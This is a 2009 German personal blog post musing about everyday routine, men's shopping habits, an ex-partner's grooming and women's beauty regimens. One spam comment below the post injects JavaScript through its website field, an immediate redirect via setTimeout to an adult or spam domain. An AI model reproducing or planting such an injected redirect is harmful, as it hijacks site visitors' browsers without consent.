reflections

männlein&weiblein

ist es nicht erstaunlich wie schnell man eine altags trott bekommt? man geht einkaufen geht zur arbeit trift sich mit freunden mach sein kram und ist abends allein. naja es hat auch sein gutes wir können soviel shoppen wie wir wollen und keiner nörgelt rum, und fragt das wievielte schwarze paar schuhe wir haben oder die tasche sieht genauso aus wie alle anderen.nein eben nicht andere form, größe u.s.w. es ist schon erstaunlich das verhalten bei männern und shoppen wenn ich so überlege war mein letzter sicher eine ausnahme er ging gern shoppen und ließ sich dabei ewig zeit das ich die jenige war die wie ein dackel mit seinen sachen hinter im her bin. da frage ich mich bei mir hat er es fast nie gemacht. ja aber er hat geschätze tausend jacken und hosen, und bei schuhen steht er mir auch in nichts nach ja war schon cool so einer. ich würde sogar sowei gehen und sagen er hatte ein tick metrosexuelles, aber das ich keinesfalls weniger männlich! nein im gegenteil er achtet sehr auf sich eine bodylotion da eine nachcreme hier, pinzette ab und zu eine maske wenn ich sie ihm drauf klatsche(hatte es erst nicht wollen) aber ich bin da hartnäckig ist ja schließlich nicht nur für frauen gemacht steht ja nicht drauf oder?! ja und maniküre hab ich auch oft gemacht bei ihm natrülich furchtbar gern :-) ja ist super wenn männer so auch sich achten. den schließlich haben wir das dreifache programm, 3 mal die woche gesichts und körperpelling, dan das stänidige wachsen oder rasieren am besten überall, dan die nägel, haare und füße die immer top gestylt aussehen müssen oder sollten.dan das passende outfit, immer cremen ja das nimmt doch schon ganz schön viel zeit in anspruch.naja was tut frau nicht alles um gut aus zu sehen.

30.8.09 00:04

Werbung


bisher 1 Kommentar(e)     TrackBack-URL


Lara / setTimeout("self.location.href='http://www.mydirtyhobby.de.gg/'",0);"www.google.de" rel="nofollow" target=_blank>Website (30.8.09 00:39)
Loool

Name:
Email:
Website:
E-Mail bei weiteren Kommentaren
Informationen speichern (Cookie)


 Smileys einfügen


Verantwortlich für die Inhalte ist der Autor. Dein kostenloses Blog bei myblog.de! Datenschutzerklärung
Werbung